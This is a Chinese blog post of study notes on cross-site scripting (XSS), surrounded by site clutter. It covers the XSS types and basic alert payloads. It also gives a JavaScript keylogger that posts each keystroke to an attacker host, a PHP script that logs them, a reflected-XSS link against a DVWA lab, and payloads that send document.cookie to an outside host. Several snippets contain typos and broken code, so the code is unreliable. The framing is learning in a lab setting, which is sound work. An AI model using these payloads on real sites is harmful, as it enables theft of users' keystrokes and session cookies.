小亮学xss

最新推荐文章于 2024-06-25 10:08:51 发布
最新推荐文章于 2024-06-25 10:08:51 发布
阅读量181 收藏
点赞数 2
分类专栏: xss 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zl52111/article/details/115019756
版权

XSS漏洞攻击的初步学习与攻击方法

1.基本介绍
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容

2.主要类型:
存储型(持久性)
反射型(非持久)
DOM型

3. 使用场景:
.

    直接嵌入html:<script>alert('xss');</script>
    元素标签事件:<body onlad=alert('xss')>
    图片标签:<img src="javascript:alert('xss');">
    其他标签:<iframe>,<div>,and <link>

4.漏洞poc

<script>alert('xss')</script>
<a href="οnclick=alert('xss')">type</a>
<img src=http://1.1.1.1/a.ipg  onerror=alert('xss')>
<script>window.location='http://1.1.1.1'<script>
<iframe src="http://1.1.1.1/victim"height="0" width="0"></iframe>
<script>document.body.innerhtml="<div  style=visibility:visible;><h1>THIS WEBSITE IS UNDER</h1></div>";</script>

解释
.onclick :单击触发
.onerror: 事件在视频/音频(audio/video)数据加载期间发生错误时触发。(给的是一个不存在的地址)
.window.location 对象用于获得当前页面的地址 (URL),并把浏览器重定向到新的页面。作用:(跳到黑客自己设置的站点 然后盗取用户输入的账号密码)
拓展:window.location 对象在编写时可不使用 window 这个前缀。 一些例子:
一些实例:
location.hostname 返回 web 主机的域名
location.pathname 返回当前页面的路径和文件名
location.port 返回 web 主机的端口 (80 或 443)
location.protocol 返回所使用的 web 协议(http: 或 https:)
.iframe 元素会创建包含另外一个文档的内联框架(即行内框架)
.最后一句话 意思是篡改目标服务器主页 使添加的内容显示出来。

5.反射型漏洞举例(可以攻击客户的Web application 使客户在此页面的键盘敲击都会返回给攻击者)

js脚本:

Document.onkeypress = function(evt){
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key){
var http = new XMLHttpRequest();
var param = encodeURl(key)
http.open("POST","http://192.168.20.8/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}在这里插入代码片

php接收代码:

<?php
$key=$_POST['key];
$loafile="keylog.txt";
$fp = fopen($logfile, "a");
fwite($fp,$key);
.  fclose($fg);在这里插入代码片

keylogger.php(接收数据) 因此还需在php下创建一个 keylog.txt文件 使被攻击者返回的数据能被显示出来

最后加上攻击者的ip地址 与被攻击者的ip地址实现攻击

<script土src="http://1.1.1.1/keylogger.js"></script>
<a href="http://192.168.20.10/dvwa/vulnerabilities/xss_r/?name=<script+src='http://192.168.20.8/keylogger.js'></script>">xss</ a>在这里插入代码片

6.存储型漏洞:(多数存在在留言板)(意思是长期储存在服务器端用户每次访问都会都会被执行js脚本)
小例子:(通过监听88端口从而实现用户cookie值的窃取)

<srcipt src=http://1.1.1./a.js></script>
.var img=new  image().img.src="http://1.1.1.:88/cookies.php&cookie="+document.cookie;

7.DOM型模板:API格式
Element --------->obj------->value
意思是从元素到文件再到具体的窃取东西

举例
用API标准格式来创建一个页面元素 img 从而定义一个攻击者自身的图片地址 然后用来窃取cookie值

<script>var
img=document.createElement("img");img.src="http://192.168.20.8:88/log&"+escape(document.cookie);</script>在这里插入代码片
小亮酸Q糖
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XSS漏洞讲解与多篇实战讲解
浪子燕青的博客
02-25 3373
跨站脚本攻击 XSS攻击基础 概述 个人对XSS攻击的原理认知: 原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得页能够执行你添加的参数功能。 危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie,获取浏览器保存的账号密码 、获取屏幕截图,获取页面的数据,改变页面的逻辑,向服务器发送数据请求等。 情景:在挖洞的情景下,只要保证能弹个窗,或者执行js代码即可。但是
XSS学习总结
ad12456的博客
03-28 1484
xss学习
跨站脚本攻击之xss手动版
weixin_47726676的博客
05-12 504
定义 Cross-site scripting (XSS):跨站脚本是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 类型 存储型(持久型) 跨站脚本可注入服务器的文件系统或数据库–引诱用户访问相关链接(貌似被用户信任的站)–被攻击用户访问相关页面(采用特定URL参数)时,恶意代码下载到浏览器并执行。 反射型(非持久型) 跨站脚本包含在向站提交内容的相关字段中–该字段将被服务器在返回页面中包含,相关字段中的跨站脚本将在浏览器端执行。–被攻击用户访
XSS大全
weixin_46601374的博客
03-01 8165
XSS的原理和特性 xss:将用户的输入当作前端代码执行 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 html:定义了页的结构 css:美化页面 js:可以操浏览器 XSS主要拼接的是什么 SQL注入拼接的是操作数据库的SQL语句。 XSS拼接的是页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML) xss
xss学习
weixin_63231007的博客
04-29 2271
反射性xss 传入<script>alert("xss")</script>,会弹出一个xss弹框。 这个弹框是无害的,但如果做的是别的事情,就有害了。 存储型xss 输入留言name:1111 Message : <script>alert("xss")</script> 之后这个站就被挂了一个非常简单的🐎,之后任何人访问这个站,都会执行这个xss脚本 这个链接被发送给其他人之后,他们一点击,就会执行这个脚本。被人引诱点击之后就..
xss漏洞学习
m0_49137360的博客
07-25 1400
xss学习
程科学习xss
m0_58453883的博客
02-16 2894
1、XSS 介绍及分类 1.1XSS 漏洞介绍 XSS又称为跨站脚本攻击,XSS的重点不在于跨站点,而是在于脚本的执行,是一种经常出现在Web应用程序中的计算机安全漏洞,是Web应用程序对用户的输入、输出过滤不足而产生的,它允许攻击者将代码植入到提供给其它用户使用的页面中。 xss可以理解为一种注入。 注入,简单理解 就是 用户输入的数据,被插入到了前端页面当中(虽然有点抽象,但理解就行) 总结也就是 用户输入的数据,被当作了前端代码进行执行。 1.2反射型xss 反射型跨站脚本(Refle
代码审计学习XSS
小白也要加油
02-05 2695
定义 跨站脚本攻击,为不和css一样写混淆,故跨站脚本呢攻击缩写为XSSXSS是一种Web应用程序的安全漏洞,主要是由于Web应用程序对用户的输入过滤不足产生的。恶意攻击者往Web页面里插入恶意脚本代码,当用户浏览该页之时,嵌入其中的Web里面的恶意脚本代码,攻击者便可以对受害者采取Cookie资料窃取,会话劫持,钓鱼欺骗等各种攻击 Less-1 <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 al
那些年我们一起学XSS
02-21
XSS完美学习教程、
Xss学习研究平台源码.zip
05-12
Xss学习研究平台源码.zip
XSS学习大全
05-02
XSS学习大全,攻防入门,轻松上手,简单易学,推荐下载
常见WEB漏洞学习整理-XSS
06-11
常见WEB漏洞学习整理-XSS
Web渗透:XSS-DOM-based XSS
WolvenSec的博客
06-21 1028
DOM-based XSS(基于DOM的跨站脚本攻击)是一种XSS攻击类型,其特点是恶意脚本通过操作文档对象模型(DOM)直接在客户端执行,而无需经过服务器的处理。这种攻击主要利用客户端JavaScript代码中的漏洞,使得攻击者能够在浏览器中注入并执行恶意代码。
XSS 安全漏洞介绍及修复方案
最新发布
墨鸦的博客
06-25 2488
XSS 安全漏洞介绍及修复方案
5.XSS-反射型(post)利用:获取cookie
愿听风成曲
06-23 217
需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post型链接上;将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件。文件路径:\pikachu\pkxss\xcookie\post.html。在pkxss平台直接获取用户信息。用户误以为是正常站去访问。基于IP地址配置文件。
XSS跨站脚本攻击对站有哪些危害
weixin_68778384的博客
06-19 598
XSS跨站脚本攻击是一种典型的Web程序漏洞利用攻击。攻击者利用Web程序对用户输入检查不足的漏洞,将可执行恶意脚本注入站或Web应用。当用户访问这些被注入恶意脚本的页时,恶意脚本会在用户的浏览器中执行,从而达到窃取用户个人数据、弹出广告、篡改页内容等攻击目的。为了防范XSS跨站脚本攻击,站开发者需要采取一系列的安全措施,如对用户输入进行严格的验证和过滤、设置安全的HTTP响应头部、使用安全的编码实践等。同时,定期更新和打补丁也是防止新发现的安全漏洞被利用的重要手段。
DVWA-XSS(Stored)-beef
06-23 548
用Low Level来测试beef的使用。
XSS跨站攻击漏洞
zhuge_long的专栏
06-23 1186
xss全称为:Cross Site Scripting,指跨站攻击脚本,XSS漏洞发生在前端,攻击的是浏览器的解析引擎,XSS就是让攻击者的JavaScript代码在受害者的浏览器上执行。XSS攻击者的目的就是寻找具有XSS漏洞的页,让受害者在不知情的情况下,在有XSS漏洞的页上执行攻击者的JavaScript代码。XSS是提前埋伏好漏洞陷阱,等着受害者上钩。既然攻击者是执行JavaScript代码,所以攻击的语句应该能让JavaScript运行。第一种 反射型。
xss-vuln学习通关总结
08-24
个人总结类文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值